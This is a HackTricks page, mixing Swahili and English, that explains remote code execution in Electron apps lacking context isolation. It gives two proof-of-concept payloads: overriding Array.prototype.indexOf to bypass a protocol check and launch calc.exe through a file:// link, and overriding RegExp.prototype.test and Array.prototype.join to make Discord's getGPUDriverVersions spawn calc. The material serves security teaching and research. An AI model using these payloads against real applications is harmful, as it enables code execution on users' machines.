Electron contextIsolation RCE via preload code

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Mfano 1

Mfano kutoka https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30

Hii code inafungua viungo vya http(s) na kivinjari cha kawaida:

Kitu kama file:///C:/Windows/systemd32/calc.exe kinaweza kutumika kuendesha calc, SAFE_PROTOCOLS.indexOf inazuia hilo.

Hivyo, mshambuliaji anaweza kuingiza hii JS code kupitia XSS au urambazaji wa ukurasa wa kiholela:

<script>
Array.prototype.indexOf = function(){
return 1337;
}
</script>

Kama wito wa SAFE_PROTOCOLS.indexOf utarudisha 1337 kila wakati, mshambuliaji anaweza kupita ulinzi na kutekeleza calc. Hatua ya mwisho ya unyakuzi:

<script>
Array.prototype.indexOf = function(){
return 1337;
}
</script>
<a href="file:///C:/Windows/systemd32/calc.exe">CLICK</a>

Check the original slides for other ways to execute programs without having a prompt asking for permissions.

Apparently another way to load and execute code is to access something like file://127.0.0.1/electron/rce.jar

Example 2: Discord App RCE

Example from https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1

When checking the preload scripts, I found that Discord exposes the function, which allows some allowed modules to be called via DiscordNative.nativeModules.requireModule('MODULE-NAME'), into the web page. Here, I couldn't use modules that can be used for RCE directly, such as child_process module, but I found a code where RCE can be achieved by overriding the JavaScript built-in methods and interfering with the execution of the exposed module.

The following is the PoC. I was able to confirm that the calc application is popped up when I call the getGPUDriverVersions function which is defined in the module called "discord_utils" from devTools, while overriding the RegExp.prototype.test and Array.prototype.join.

RegExp.prototype.test=function(){
return false;
}
Array.prototype.join=function(){
return "calc";
}
DiscordNative.nativeModules.requireModule('discord_utils').getGPUDriverVersions();

Funguo la getGPUDriverVersions linajaribu kutekeleza programu kwa kutumia maktaba ya "execa", kama ifuatavyo:

module.exports.getGPUDriverVersions = async () => {
if (process.platform !== 'win32') {
return {};
}

const result = {};
const nvidiaSmiPath = `${process.env['ProgramW6432']}/NVIDIA Corporation/NVSMI/nvidia-smi.exe`;

try {
result.nvidia = parseNvidiaSmiOutput(await execa(nvidiaSmiPath, []));
} catch (e) {
result.nvidia = {error: e.toString()};
}

return result;
};

Kawaida execa inajaribu kutekeleza "nvidia-smi.exe", ambayo imeainishwa katika mabadiliko ya nvidiaSmiPath, hata hivyo, kutokana na RegExp.prototype.test na Array.prototype.join zilizobadilishwa, hoja inabadilishwa kuwa "calc" katika _execa_'s internal processing.

Hasa, hoja inabadilishwa kwa kubadilisha sehemu mbili zifuatazo.

https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L36

https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L55